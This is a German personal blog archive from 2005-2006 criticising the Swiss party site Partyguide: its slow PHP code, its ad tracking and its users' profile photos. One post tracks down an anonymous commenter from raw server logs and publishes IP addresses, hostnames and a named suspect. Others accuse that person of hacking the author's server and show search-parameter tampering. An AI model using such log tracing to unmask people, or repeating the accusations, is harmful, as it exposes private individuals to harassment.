Als ich mit meiner Serie/Kampagne im August 2005 startete ("Partyguide sucks"), konnte ich nicht wissen, dass im März 2006 der endgültige Beweis erbracht werden sollte, dass Partyguide entweder vom Netz genommen oder von Grund auf neu programmiert werden sollte.
Wann wacht ihr endlich auf?!
Übrigens
Auch ganz nett: Persönliche Einstellungen.
Labels: Partyguide
Samstag, März 11, 2006
Auf den Spuren eines anonymen Kommentators
Anonyme Kommentare - nun gut. Wer die Balls nicht hat. Aber wie BloggingTom es heute bedauerte:
Übrigens: Wär doch schön wenn man wüsste, mit wem man hier diskutiert. Insofern finde ich "anonym" etwas schade. Just my two cents...
Da im Netz niemand wirklich anonym ist, recherchiere ich aus Langeweile (und als kleine Herausforderung) ein bisschen. Welch' ein Glück, dass ich mein Blog auf dem eigenen Server hoste und so Zugriff auf die RAW-Logs habe.
Als erstes filtere ich das gestrige RAW-Log nach Zugriffen auf die entsprechende Seite. Der Kommentator muss ja den Kommentar von BloggingTom auf seinen Kommentar zuerst lesen, um darauf antworten zu können:
cat access.log | grep "GET /2006/03/partyguide-und" > access-filtered.log
25 Hits wurden auf diese Seite im Laufe des 10. März registriert. 7 Suchmaschinen-Einträge fallen weg, sind es noch 18 Stück.
Wie verhält sich der anonyme Kommentator wohl? Ich vermute im Laufe meiner Recherchen, dass er BloggingToms Kommentar liest und danach gleich seine Replik verfasst. Also interessieren mich die Zugriffe vor 15:16 Uhr und hoffe insbrünstig, dass Blogger.coms Uhren in etwa richtig justiert sind.
Drei Zugriffe kommen in die engere Wahl:
[1] wod0001.zl.com - - [10/Mar/2006:14:24:43 +0100] "GET /2006/03/partyguide-und-die-verweilzeit.html HTTP/1.1" 200 12275 "http://www.cocomment.com/comments/BloggingTom" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" [2] 80-219-177-208.dclient.hispeed.ch - - [10/Mar/2006:15:05:57 +0100] "GET /2006/03/partyguide-und-die-verweilzeit.html HTTP/1.0" 200 12275 "http://search.blogger.com/?as_q=partyguide&ie=UTF-8&ui=blg&bl_url=blog.emeidi.com%2F&x=238&y=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" [3] 146.67.250.199 - - [10/Mar/2006:15:10:54 +0100] "GET /2006/03/partyguide-und-die-verweilzeit.html HTTP/1.1" 200 12275 "http://search.blogger.com/?as_q=partyguide&ie=UTF-8&ui=blg&bl_url=blog.emeidi.com%2F&x=238&y=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Ich verfüge nun also über drei IP-Adressen und die Informationen der verwendeten Browser. Auch sehr schön ersichtlich sind die sog. "Referer", also die Angaben, von wo (URL) ein Besucher auf meine Seite kam (bspw. durch den Klick auf einen Link auf einer anderen Seite).
Die Hispeed-Adresse interessiert mich auf den ersten Blick am Meisten. Der einfachste aller "Tricks": Man gibt diese in den Browser ein und schaut, ob eine Antwort zurückkommt. Viele Leute betreiben ja heutzutage zu Hause einen kleinen Web-Server. Für mich das gefundene Fressen - wenn denn eine Antwort zurückkommt:
80-219-177-208.dclient.hispeed.ch
Kaum zu glauben - es Antwortet jemand. Ich werde aber gleich auf eine "offizielle" Web-Site umgeleitet:
beta:~ mario$ wget 80-219-177-208.dclient.hispeed.ch
--00:51:07-- http://80-219-177-208.dclient.hispeed.ch/
=> `index.html'
Resolving proxy.hispeed.ch... done.
Connecting to proxy.hispeed.ch[62.2.17.118]:8080... connected.
Proxy request sent, awaiting response... 302 Moved Temporarily
Location: http://www.bimixx.ch/ [following]
Was ist denn das? Aha: "bimixx Network ist ein gratis WebHoster". Spannend. Muss aber noch nichts heissen - der Name sagt mir jedenfalls nichts.
Wer steckt wohl dahinter? Schauen wir mal doch mal bei Über uns ...
Und jetzt haut's mich vom Hocker. Volltreffer! Was lese ich dort:
Nach der Reorganisation von bimixx.ch besteht das Team nur noch aus Sandro Roth und Fabio Di Lorenzo. Bald gibts hier mehr =)
Fabio Di Lorenzo? Den kenn' ich doch! Bestens sogar. Ich habe LuLu vor wenigen Wochen einen think eMeidi-Artikel gewidmet: Partyguide bloggt.
Di Lorenzo ist nicht nur frischgebackener Blogger, sondern auch als Photograph für Partyguide tätig. In der Hierarchie trägt er den spannenden Titel "Regionalmanager Zürich" (PG-Profil dilorenzo). Mehr über ihn in seinem Steckbrief.
Ich kann es natürlich nicht beweisen, doch ich vermute stark, dass es sich beim anonymen Kommentator um ihn handelt.
Jetzt kann ich wieder beruhigt schlafen *zwinker*.
Labels: Partyguide
Freitag, März 10, 2006
Gangsta-Jugend
Auch die schweizerische Jugend nutzt das Internet immer intensiver und ergreift die vielfältigen Möglichkeiten, sich im World Wide Web anderen Leuten zu präsentieren. Präsentieren ist das richtige Wort dafür - Image ist alles. Insbesondere gerade Mitglieder der Generation Hip-Hop (wie konnten wir es nur dazu kommen lassen?) haben sich in mühseliger Arbeit ein individuelles Selbstbildnis gezimmert. Komisch nur, dass alle dasselbe anziehen, sagen und hören.
Erst kürzlich habe ich ja einige bildnerische Trouvaillen von Partyguide-Benutzern präsentiert. Lange vor mir kamen aber bereits andere Blogonauten, die sich dem Thema angenommen haben! Schön, dass die heutigen Tendenzen nicht nur mich stören.
Ist euch schon aufgefallen, wie viel junge Teenager sich sehr provokativ und sexistisch präsentieren? Wenn deren Eltern davon wüssten, wären sie alles andere als begeistert. [...] Nicht zu vergessen sind diese unleserlichen Texte mit diesen Slangs und Schreibweisen der Jugendliche.
Quelle: Ich hasse Meinbild.ch
125 Kommentare - soviele Antworten habe ich noch nie auf einen Blog-Artikel eintrudeln sehen. Die Lektüre dieser ist langwierig, aber spannend:
Nein, die Seite meinbild.ch ist mal wieder eines dieser tollen Beispiele, das Zeigt für was unsere Jugend auch fähig sein kann. Ein solches Beispiel nimmt einem manchmal ganz arg den Wind aus den Segeln, wenn man für einen starke Jugend einstehen möchte.
Gerade deswegen weil sich zeigt auf welch niedrigem Niveau sich unsere Jugend inzwischen bewegt. Denn wenn ich mich mal schlecht fühle, mit mir selbst mal wieder nicht zufrieden bin und ich mich selbst frage, ob ich wohl nicht ganz normal bin, dann mus ich nur die Website meinbild.ch besuchen und ich merke wieder, wie froh ich eigentlich sein kann, nicht zum Durchschnitts-Niveau zu gehören.
wered all so konservativ wie ihr, würdemer no i höle wohne und mitere kühle um fraue werbe!!!! all redet vonere verblödig und nivolosiket.. ich sege aber es isch es anders nivo vo eus junge, es revoluzioners*g* mi hend hald kei ziit und lust me uf die ganz rechtschribe schei****e, üses ziel isch sich zverstendige underenand, obs jetz en gangsa- skater- sprayer- kifferslang isch, spielt kei rolle.. klar, die 14 jährige halb nakte meitli findi au nöd grad guät, vorallem mit all dene pedos wos inzwüsche git..
[Antwort an den Revoluzzer] Revolution? Dass ich nicht lache. Eine Revolution der Verblödung? Da sieht man’s mal wieder, wieviele der jungen Leute dumm sind und auch dumm bleiben. Nur weil 50% und mehr (Messlatte: meinbild.ch) der Youngsters nicht mehr richtig Deutsch sprechen plus schreiben, sollen sich die Intellektuellen deren anpassen? Nicht mit mir! Mir scheint, als müsste man inzwischen weniger von einer “Verblödungsrevolution” sprechen als von einer Intellektualrevolution.
[...] und diese slangs, das ist einfach das, was wir heutzutage benutzen. es sieht einfach cooler aus, wenn man einen slang benutzt.
ich sege eigentlich nix übner anderi lüt aber die chline 11 jöhrigi wo halb nackt im meinbild sind isch scho chli danebet
übrigens: ja ich finde dass ich inteligent [sic!] bin danke:D
mein gott ir scheiss tye sind so beschisse demlich ey, ir labered was vo verblodig vo de menschheit, aber ir sind scho lang verblodet, raffed ers ned?
[CUT]
Und es geht ewigs so weiter - anscheinend lesen die Teenies auch Blogs? Und sie kommentieren auch und verteidigen ihr Revier. Wow :-)
In der Blogosphäre wurden Morphis Worte in weiteren Artikeln verarbeitet:
Normale Entwicklung?
Trotzdem:
Meinbild.ch zeigt also auf, auf welchem ach so tiefen Niveau unsere Jugend, ich inbegriffen, heutzutage steht. Ich kann dem absolut nicht beipflichten. Wir haben unsere eigene Sprache, voll von Anglizismen, schwiizerdütsche Wörtlis, und “Insider”- Ausdrücken. Aber ist das wirklich so schlimm? Schliesslich hat jede Generation irgendwie ihre eigene Umgangssprache, sie ist sogar notwendig um sich von anderen Gruppen abzugrenzen.
Guter Punkt. Die alte Generation steht der nachfolgenden immer skeptisch gegenüber, wobei wir in diesem Fall ja nicht vom Konflikt zwischen Eltern und ihren Kindern, sondern zwischen Teenagern (14 bis 18?) und jungen Erwachsenen (18+) reden.
Dass die Sprache dauernd im Fluss ist, zeigt die Forschung ja klar auf. Damit muss man sich abfinden. Obwohl ich finde, dass gepflegtes Deutsch im späteren Berufsleben wichtig ist (oder wollen Meinbildler solche Jobs gar nicht?), darf man die Jungen nicht dauernd daran aufhängen. Die Slanger müssen sich einzig bewusst sein, dass sie (noch?) nicht die Regeln machen. Und solange man die Regeln nicht macht, sollte man sich anpassen. Oder auswandern und einen Freistaat gründen.
Was mich aber stört ist die ganze Hip-Hop-Kultur, inspiriert durch das US-amerikanische Gangstertum. Das Bild, das durch all die Hip-Hop-Clips aus den Staaten in unsere Wohnzimmer flimmern, ist bedenklich. Viel zu viele Junge orientieren sich am Gangstertum und fühlen sich als Reinkarnation der Ghetto-Boys. Sie handeln leider auch immer wie mehr danach. Das ist das wahre Problem. Und diese Tendenzen beunruhigen mich, weil die Pimps und Gangstas noch nicht aufgezeigt haben, wie man das von ihnen vorgelebte Leben wirklich bestreitet (Wie fährt man eine schicke Karosse? Wie hat man dauernd drei Bitches um sich herum? Wie kommt man zum täglichen Brot?).
Kommas einsetzen
Zum Schluss noch einer dieser "Kommas, mir doch egal"-Ergüsse:
Sali zämmä ich finde das mega übertriebe vu verblödig vu dä jugend zredä sorry hey äs wird immer meh verlangt vu dä jugendliche egal i wellere richtig d’asprüch werdet immer extremer und respekt das viel jugendlichi dem gwachse sind und jetzt zu denä slangs dsproch isch lebendig und entwicklet sich und so slangs sind eini vu villne grundlage das sich eusi sproch witerentwicklet ob zum guete oder schlechte naja das isch gschmacksach und no so vuwägä kritik jo kritik isch an und für sich okay solang si konstruktiv isch aber i hacket jo nume druff umä naja so erreicht mir jugendliche äs ziel diä “allzugschiede” hässig mache also sorry würd zerscht mol luege wiä mers besser cha mache und ned verabscheue bye bye s’hansli
Erinnert mich an meinen Artikel Rechtschreibung und Stil in deutschen Blogs. Diesen Text könnte übrigens der/die Suchende benutzen, wo [sic!] mit der Suchanfrage "Text wo die Kommas noch nicht eingesetzt sind." auf mein Blog gekommen ist *grins*
Labels: Partyguide
Donnerstag, März 09, 2006
Partyguide und die Verweilzeit
PartyGuide.ch mit grösster Verweilzeit aller Schweizer Websites
[...] Ein Besucher verweilt durchschnittlich 20,21 Minuten auf PartyGuide.ch.
Quelle: Werbung
Pointierte Kritik
Ob ihr wirklich die "grösste Verweilzeit aller Schweizer Websites" (Werbemail) aufweist, wollen wir mal in den Raum gestellt lassen. Wahrheitsgetreuer wäre es wohl gewesen, den Zusatz "(aller WEMF-beglaubigten) Schweizer Websites" zu benutzen.
Wie diesen Spitzfindigkeiten auch sei - dass ihr eine derart hohe Verweildauer habt, liegt vielleicht nicht unbedingt am Willen der Besucher, sondern an der technischen Infrastruktur. Kein regelmässiger Partyguide-Besucher wird nämlich behaupten wollen, dass sich eure Seiten rasch aufbauen. Im Gegenteil, neben mod_proxy-Fehlern wartet so mancher gegen eine Minute, wenn er zu Spitzenzeiten (Sonntag-Mittag bis -Abend) das Angebot besuchen will. Wer es nicht glaubt, probiert es in drei Tagen doch gleich selber aus.
Somit bezweifle ich die Aussagekraft dieser "20 Minuten".
Dennoch: Weiter so!
Partyguide, sehr gut! Die Idee hinter eurem Produkt ist genial, die angebotenen Funktionen lassen die User wiederkehren - aber leider ist die Umsetzung immer noch katastrophal. Hier müsst ihr in kürzester Zeit deutlich besser werden - dann schlagt ihr vielleicht sogar tilllate. Euer Traum wäre in den Olymp der schweizerischen Partysites vorzustossen - meiner, dass ihr anständiges Zeugs zusammencodet.
Dank: BloggingTom
Labels: Partyguide
Montag, März 06, 2006
Partyguide-Bilder deuten
Ich gebe es zu - mich zieht es desöfteren auf Partyguide, um mir die neusten Neuzugänge anzuschauen (natürlich immer im Schneckentempo, weil die Entwickler dort kein performantes PHP hinkriegen). Da die Benutzer bis zu 15 persönliche Fotos auf ihr Profil laden können, kann dies sehr erheiternd, aber auch sehr "disgusting" sein.
Da ich diesbezüglich ein alter Hase bin, habe ich bereits mehrere Male mit dem Gedanken gespielt, die einzelnen Bilder-Typen zu katalogisieren. Wer sich durch Hunderte Uploads durchgeklickt hat, merkt mit der Zeit, dass sich die Bilder(feuer)werke in einige wenige Kategorien einteilen lassen. Kollege Torquie hätte garantiert auch mitgeholfen.
Glücklicherweise muss ich nun nicht mehr dahinter, da bereits ein anderer, analytisch begabter Zeitgenosse die Arbeit für mich übernommen hat (und das sogar eine Frau! Yeah!):
Photo Type: Close-up of breasts, usually in bustier [der Partyguide-Klassiker schlechthin]
What they want you to think: Sexy and naughty
The Truth: Fat
Quelle: The Buttafly Guide to Interpreting Friendster Photos
Beispiel
Sorry Partyguide-Jungs, aber ich verlinke mal wieder direkt auf Bilder. Bitte nicht hauen, es steht im Dienste der Wissenschaft:
What they want you to think
The Truth
anonymisiert
Das Beste: Er hat vollkommen Recht! Aufgrund empirischer "Studien" meinerseits kann ich alles gesagte sofort unterschreiben. Die Globalisierung ist diesbezüglich eben doch schon weit fortgeschritten - ob in den USA oder der Schweiz, das mit den Bildern funktioniert gleich.
Der Liste würde ich noch die Groupies hinzufügen: Ob Hip-Hop-Gangstas oder Filmstars - man lädt auch diese ins Profil.
Ganz interessant sind auch solche Statements, zumeist verbreitet in der Hip-Hop-Szene:
... oder das:
... auch nicht schlecht:
Aufpassen, sonst setzts was - vom ... "Playa"?:
Völlig neue Wortkreationen:
"mah" ... "Ma meh"?
Selbstbewusstseinsstörungen? Wahrscheinlich gönnt man sich unter den Teenie-Gören einfach nichts ;-)
Witz am Rande
Den möchten wir alle als "Friendstr".
Dank: Kollege Burgdorfer.
Labels: Partyguide
Donnerstag, März 02, 2006
Partyguide lernt
Der Zufall will es, dass auf meinen letzten Partyguide-Artikel von gestern Nacht gleich noch mal einer folgt. Keine Angst! Da kein Mensch ein zweifaches Bashing pro Tag erträgt, hier für einmal ein Lob. Aber begründet.
Nach dem Motto: "Und sie dreht sich doch!" kommt Bewegung in die Sache. In meinem Artikel Effiziente Web-Projekte anhand von Partyguide, Teil 2 habe ich die performance-intensive Generierung des "Pie Charts" kritisert. Das Kuchendiagramm, das bei jedem Seitenaufruf serverseitig mit PHP/GDlib neu generiert wird, war mir ein Dorn im Auge:
Abgesehen von zu langen Fliesskommazahlen stellt sich mir die viel brennendere Frage, ob man diese Kuchendiagramme wirklich bei jedem Aufruf dynamisch generieren sollte? Wäre es performance-mässig nicht deutlich intelligenter, auf eine statische Grafik zu verweisen?
Dies ist ohne weiteres machbar - und würde den Web-Server entlasten. Anstelle ein PHP-Script aufzurufen, dies durch den PHP-Parser zu jagen, die GDlib (oder was für eine Grafik-Bibliothek auch immer bei Partyguide im Einsatz steht) zu starten, das Bild zusammenzusetzen und die Binärdaten zum Client zu senden, würde es ausreichen, wenn Apache ein im Filesystem liegendes GIF oder PNG an den Browser zurücksenden zu lassen.
In - sagen wir - 80% der Fälle ist es nämlich gar nicht nötig, das Bild neu zu berechnen, weil das Profil keine neuen Bewertungen erhalten hat. Zudem verändern sich die Diagramme von Accounts mit sehr vielen Bewertungen auch weniger rasch - wenn zu 1000 Bewertungen eine weitere dazu kommt, bedeutet dies Änderungen im Promillebereich, die bei einer derart kleinen Grafik kaum zu erkennen wäre.
Heute nun habe ich per Zufall bemerkt, dass das Diagramm ausgewechselt wurde:
Zwar nicht wie von mir vorgeschlagen durch eine statische Version (s. Zitat aus meinem früheren Artikel), sondern durch ein Flash-Kuchendiagramm. Heureka! Es tut sich was.
Es freut mich natürlich primär einmal, dass man die grauen Hirnzellen angestrengt hat und eine einfallsreiche Lösung entwickelt hat, die mich positiv überrascht! Obwohl ich kein Freund von Flash bin, muss ich den Entwicklern attestieren: Ziel erfüllt. Die Prozessoren der Server werden es euch danken. Denn neu wird die Grafik rein clientseitig generiert, also nur noch die CPUs der Benutzer in Anspruch genommen.
Ich freue mich, in nächster Zeit weitere Detailverbesserungen entdecken zu dürfen. Nun scheint ein Profi am Werk zu sein, der sein Handwerk versteht.
Labels: Partyguide
Donnerstag, März 02, 2006
Partyguide: Suche ich halt selber ...
Um auf meine früheren Partyguide-Bashings zurückzukommen: Ein weiterer Hinweis, wie schitter die PHP-Programmierung wirklich ist, liefert mein klitzekleiner Hack, den ich letzten Samstag per Zufall entdeckt habe.
Anscheinend unterscheiden die Entwickler dort nicht zwischen POST- und GET-Variablen. Deshalb ist es mir möglich, die (ursprüngliche) mittels POST-getätigte Suche auch mit GET-Variablen zu tunen. Ich befürchte fast, dass die Partyguide-Devs sogar noch Register Globals aktiviert haben ... *pfffrt*
Der Stein des Anstosses: Die Personen-Suche, mit der man Mitglieder der Community nach bestimmten Kriterien (Geschlecht, Alter, Wohnort, Kanton ...) suchen kann.
Komischerweise kann man als "Land" nur CH, D, A, F und LI auswählen, obwohl bei Profilen auch unzählige andere Herkunftsländer erfasst werden. Ist der Programmierer da aus dem Code nicht mehr schlau geworden? Hatte er durch die Überstunden, die für die Wartung des chaotischen Codes daraufgehen, schlicht keine Zeit mehr, weitere Länder in die Liste einzufügen? Wir wissen es nicht. Aber zum Glück gibt es ja mich:
- Suche Schwedinnen, wohnhaft im Kanton Bern, mit Foto
- Suche Türkinnen, wohnhaft im Kanton Bern, mit Foto
- Suche Amerikanerinnen, wohnhaft im Kanton Bern, mit Foto
Wer in einem anderen Kanton suchen will, ersetzt das Kürzel der GET-Variable 'kanton' mit dem entsprechenden Kantons-Kennzeichen. Wer gesamtschweizerisch suchen will, löscht die GET-Variable 'kanton' einfach. Für das Länderkürzel schaut man am Besten in eines der Profile hinein - oder zieht die Liste der Country Data Codes als Merkhilfe bei.
Gratulation, Jungs! Anstatt neuer Server solltet ihr euch wirklich mal hinter ein Re-Design und Re-Code setzen. Als Coder empfehle ich euch Bitflux und bytezh (Macher von Slug). Gerade letzterer zeigt tagtäglich, wie man performante Applikationen (Abchecken/Einsammeln von unzähligen Blogs aus der Schweiz im Minutentakt) effizient löst. Und das Design ist schlicht, aber genial - und funktionell.
Labels: Partyguide
Donnerstag, Februar 16, 2006
Partyguide bloggt
Okey, ich habe ein wenig gelogen - "nur" der Regionalmanager Zürich von Partyguide bloggt:
Fabio "Lulu" Di Lorenzo kenne ich bereits seit einer Weile - er hat nämlich just vor zwei Jahren meinen Server gehackt. Glücklicherweise hinterliess er derart viele Spuren, dass ich ihn dank Hinweisen im Error-Log und mit Links auf komischen Seiten ausfindig machen konnte - inkl. seiner Bluewin-Mail-Adresse.
Sicherheitslücke
Um mir auf einfachste Art und Weise Dateien zusenden zu können, hatte ich damals auf meinem (Windows)-Server ein selbergeschriebenes PHP-Upload-Script installiert. Mein Denkfehler: Damit war es möglich, auch PHP-Dateien (!) auf den Server zu laden. Eine gewisse Zeit lang bemerkte niemand diesen Fehler - bis "Lulu" kam. Da Apache mit Windows-System-Rechten lief, hatte er so vollen Zugriff auf meinen Server - Glück im Unglück: Es wurden keine Daten gelöscht.
Heute läuft mein Server unter Debian, mit einem abgesicherten Apache und ohne Upload-Script.
Lulu: Willkommen in der Blogosphäre!
Labels: Linux, Partyguide
Mittwoch, Februar 08, 2006
Begehrte Partyguide-Benutzerinnen
Ein relative neues Phänomen habe ich in den letzten Tagen bei meiner so geliebten Partyguide-Safari entdeckt. Personen, die einen Partyguide-Account besitzen, können nämlich bis zu 15 persönliche Bilder auf ihr Profil hochladen. Unter anderem fand ich dies:
Quelle: Benutzerin blondie86
Quelle: Benutzerin JenniferBE
Unser Geschlecht scheint sich beim Bezirzen der weiblichen Benutzer auf der Party-Site mächtig ins Zeug zu legen und die Tastaturen zum Glühen zu bringen. Der Single-Markt scheint auch hier am Leben zu sein - und wie.
Um das ganze ein wenig ins Lächerliche zu ziehen, habe ich nun meine INBOX auch gefüllt (als HTML-Veteran ja kein Problem):
Nachtrag: CSS
Der CSS-Entwickler bei Partyguide sollte den Code derart bereinigen, dass der Text auch wirklich auf jedem Browser rot angezeigt wird. Aber das ist ja nur ein Detail.
Labels: Partyguide
Dienstag, Januar 31, 2006
Partyguide, Doubleclick und Datenschutz
Kein Tag vergeht, ohne dass Partyguide mich ins Grübeln bringt. Nur per Zufall bin ich gestern Abend in meiner console.log auf verräterische Einträge gestossen:
[445] http://ad.ch.doubleclick.net/adj/partyguide.rr.ch/ohnepop_468x60; dcopt=ist;age=25;sex=m;plz=3176;sz=468x60;tile=1;ord=1949812998?: ReferenceError - Can't find variable: description
(Umbruch aus optischen Gründen)
Was lernen wir dabei? Partyguide "erlaubt" es sich, mein Alter, mein Geschlecht und die PLZ meines Wohnortes an den "digitalen Werbetreibenden" Doubleclick zu senden. Die Privacy Policies beruhigen mich auch nicht sonderlich ...
Obwohl ich ein offener Mensch bin, geht mir das dann doch gar zu weit. Ich werde den Host doubleclick.net wohl auf 127.0.0.1 umleiten müssen, um wieder ruhig schlafen zu können. Falls jemand effektivere Tipps hat (ich surfe mit Safari, sprich Firefox-Extensions sind nicht von Interesse), soll mir diese bitte zukommen lassen.
Wohlstand ausgebrochen?
Sind die Erlöse aus Doubleclick und den Gönner-Beiträgen etwa gar in die Finanzierung des neuen Gefährt des Partyguide-Gründers umgeleitet worden?
Nachtrag
Folgender Eintrag in /etc/hosts hat den Spuk nun beendet:
0.0.0.0 ad.ch.doubleclick.net
Labels: Partyguide
Sonntag, Januar 29, 2006
Staatskunde-Nachhilfe für Partyguide-Benutzer
Für einmal haben die Macher hinter Partyguide nichts zu befürchten. Auch wenn ich mit ihnen normalerweise nicht zimperlich umgehe, habe ich mich heute auf die Konsumenten eingeschossen.
Einigen von denen würde Nachhilfe in Staatskunde nicht schaden. Dort würde man beispielsweise lernen, dass ...
- Burgdorf nicht im Kanton Solothurn liegt
- Flamatt nicht im Kanton Bern
- Überstorf, im Gegensatz zu Albligen, keine bernische Enklave auf dem Gebiet des Kantons Freiburg ist
Das besorgniserregende daran: Es scheint sich dabei nicht um Einzelfälle zu handeln, wie die Screenshots zeigen. Wollen wir weiterhin bei der Bildung sparen?
Dank: Kollege Torquenstein.
Labels: Partyguide
Sonntag, Januar 15, 2006
Blog-Studie veröffentlich
Per Zufall bin ich auf die Resultate einer (deutschen) Blog-Studie aufmerksam geworden, an der über 5'000 Blogger teilgenommen haben:
Abgesehn von dem mir unverständlichen Titel gab es eine (nicht so überraschende) Findings:
Die Ergebnisse können daher keinen Anspruch auf statistische Repräsentativität beanspruchen, erscheinen aber als aussagekräftig für die aktive deutschsprachige Blogosphäre. [...] Das soziodemographische Profil dieser Gruppe entspricht in etwa dem von Pioniernutzern neuer Internet-Technologien (hohe formale Bildung; um die 30 Jahre alt; oft noch in einer schulischen oder studentischen Ausbildung), weist aber ein vergleichsweise ausgeglichenes Geschlechterverhältnis auf. Unter den Weblog-Autoren im Teenager-Alter sind Frauen gegenüber Männern sogar deutlich in der Überzahl.
Nicht schlecht gestaunt habe ich über die Geschlechterverteilung. Ich kenne nur gerade ein von mir häufig frequentiertes Blog, das von einer Frau betrieben wird. Zwar - halt! Expat Travels gehört auch noch dazu.
Die häufigsten Gründe für das Führen eines Weblogs sind Spaß und Freude am Schreiben sowie der Wunsch, Ideen und Erlebnisse für sich selbst festzuhalten.
Ersteres war mein ursprünglicher Beweggrund, doch immer mehr finde ich es auch faszinierend, "zurückzublättern". Das Blog als Tagebuch - immer wichtiger.
Nahezu alle Autoren erlauben Kommentare in ihrem Weblog, wobei oft nur wenige Beiträge tatsächlich zu Rückmeldungen der Leser führen.
Eindeutig. Dennoch: Immerhin gibt es Leute, die extrem lange Kommentare abgeben (Qualität vor Quantität?).
Für diejenigen, die ihr Weblog länger [als drei Monate] führten, gewannen allerdings Bedenken zur Privatsphäre an Bedeutung.
Bei mir gibt's diese Bedenken überhaupt nicht - dagegen bei meinen Kollegen umso mehr *zwinker*
... das Publizieren von Inhalten, die in anderen Medien nicht vorzufinden sind.
Der Grund, wieso traditionelle Print-Produkte nichts zu befürchten haben, aber auch wieso Blogs nicht mehr aussterbern werden.
Guet Nacht!
Labels: Partyguide
Mittwoch, Dezember 28, 2005
Partyguide definitely sucks
Von einem versierten Kollegen (Codename: EMC) habe ich gerade folgende URL zugeschickt erhalten:
Test- und Produktivsystem
Googles Cache liefert manchmal Kompromittierendes zutage *händereib* Die PHP-Warnings lassen erkennen, dass anscheinend bei den Bastlern von Partyguide gar nicht so selten ungetesteter Code auf das Produktivsystem gelangt. Mir wäre so etwas mehr als peinlich ... Vor allem, wenn da täglich tausende Besucher vorbeischauen.
Wie wäre es, wenn die Partyguide-Entwickler Test- und Produktivsystem trennen würden? Jungs, ich wäre für eine weitere Gönner-Aktion.
Welche Dateiendung hätten's denn gerne?
Wer sich gezielt achtet, erkennt die kreative Vielfalt, die auf den Partyguide-Server herrscht: Manchmal enden PHP-Scripts auf .php, manchmal dann doch lieber .php3 - und weil's zu Dritt am Schönsten ist darf auch das totgeglaubte .phtml nicht fehlen.
Auch für diesen Tipp danke ich für den Hinweis meines Informanten.
Fazit
Partyguide - weiter so! Eine Due Diligence-Prüfung eurer Technik würdet ihr wohl aber nicht überstehen ... Schade! Aber ihr habt Wichtigeres zu tun, stimmts?
Labels: Partyguide
Mittwoch, Dezember 28, 2005
Effiziente Web-Projekte anhand von Partyguide, Teil 2
In meinem ersten Teil der hier vorliegenden Serie, die sich an fortgeschrittene Web-Developers richtet, habe ich bereits einige fundamentale Fehler aufgezeigt, die auf Partyguide anzutreffen sind. Diese Kritik liesse sich ohne weiteres auf viele andere Web-Projekte übertragen - auch Sites von mir, die mehrere Jahre auf dem Buckel haben, könnten an der einen oder anderen "Krankheit" leiden. Ich versuche aber, ständig an meinem Code zu feilen und ihn zu verbessern. Deshalb sind die meisten Sites, die ich dieses Jahr für Kunden erstellt habe, denn auch mit Hilfe von CSS2 realisiert. Das altgewohnte "Tabellendesign" konnte ich so erfolgreich in Pension schicken.
Den vorigen Artikel habe ich auch an die Verantwortlichen geschickt, wurde aber mit meinem Votum aber nicht ganz ernst genommen:
Was clientsite programming anbelangt... Ist 2. Priorität. Erste Priorität ist, dass die SQL Statements/Serverkonfigurationen so sind wie sie sollten.
Aber vielleicht bist du ja noch zu unerfahren um irgendwie was über "prioritäten" zu wissen ;-)
Quelle: Mail von Philippe Knaus vom 28. Dezember 2005
"If it ain't broken, don't fix it" oder schärfer ausgedrückt: "Es läuft ja, wo ist das Problem?". Der Unterschied zwischen laufen und performant laufen kann aber gross sein. Meine These lautet deshalb: Bei Partyguide werden unnötigerweise Ressourcen verschwendet, weil man lieber neue Features einbaut, anstelle den bestehenden Code zu optimieren (Flickr.com, mein momentaner Star am Web-Himmel kriegt beides unter den Hut - dort sitzen aber auch Profis dahinter).
Übrigens: Wikipedia vermeldet zum Thema 'Optimieren' treffenderweise:
In computing, optimization is the process of modifying a system to improve its efficiency.
Quelle: Optimization (computer science)
Im zweiten "Hands-on-Partyguide"-Teil habe ich wieder zwei Don'ts gefunden, die als gutes Lehrstück herhalten.
On-The-Fly Kuchendiagramm
Im Laufe der Zeit hat PHP gelernt, bei der Erstellung von Grafiken behilflich zu sein. Partyguide nutzt dies aus, um ein Kuchendiagramm zu generieren (s. rechts). Benutzer mit einem Profil sehen auf diese Weise sofort, wieviele Bewertungen ("Wow", "Herzig", "Nicht mein Typ") sie (relativ) erhalten haben.
Das Generieren von Grafiken ist speicher- und CPU-intensiv. Während ich das letzte Mal den Fokus eher auf Traffic-Verminderung gelegt habe, geht es in diesem Abschnitt darum, den Performance-Hunger von PHP-Scripts zu mildern.
Das Kuchendiagramm wird bei jedem Aufruf des Profils einer Person angezeigt. Dazu werden die von anderen Benutzern erhaltenen Bewertungen aus der Datenbank gelesen, aggregiert und an ein PHP-Script weitergegeben, das aus den übergebenen Daten ein Kuchendiagramm hervorzaubert:
<img src="user_details_diagramm.php? rate1=21.276595744681& rate2=125.95744680851& rate3=212.76595744681" width="100" height="100" border="0" align="left">
Int oder Float?
Auf den ersten Blick fällt dem geübten Auge auf, dass die Zahlen recht lang daherkommen. Muss das so sein? Nein. Denn schliesslich benötigt ein Kuchendiagramm keine Präzision auf über 10 Nachommastellen genau. Optimal wäre es, wenn das Script, dass die URL generiert, die Zahlen gleich in Prozente umwandeln würde. Dann würden sage und schreibe NULL Nachkommastellen reichen, um eine Grafik herzuzaubern.
Übrigens - die URL kann man ohne weiteres in eigene Projekte einbinden und so Kuchendiagramme nach eigenem Gusto anzeigen. Ob dies viel bringt, ist eine andere Frage ... Ich jedenfalls stelle das obige Bild genauso dar - ich binde es direkt vom Partyguide-Server ein. Mal schauen, wie lange es geht, bis die Entwickler einen Referer-Filter einbauen *smile*
Statisch oder Dynamisch?
Abgesehen von zu langen Fliesskommazahlen stellt sich mir die viel brennendere Frage, ob man diese Kuchendiagramme wirklich bei jedem Aufruf dynamisch generieren sollte? Wäre es performance-mässig nicht deutlich intelligenter, auf eine statische Grafik zu verweisen?
Dies ist ohne weiteres machbar - und würde den Web-Server entlasten. Anstelle ein PHP-Script aufzurufen, dies durch den PHP-Parser zu jagen, die GDlib (oder was für eine Grafik-Bibliothek auch immer bei Partyguide im Einsatz steht) zu starten, das Bild zusammenzusetzen und die Binärdaten zum Client zu senden würde es ausreichen, wenn Apache ein im Filesystem liegendes GIF oder PNG an den Browser zurückzusenden.
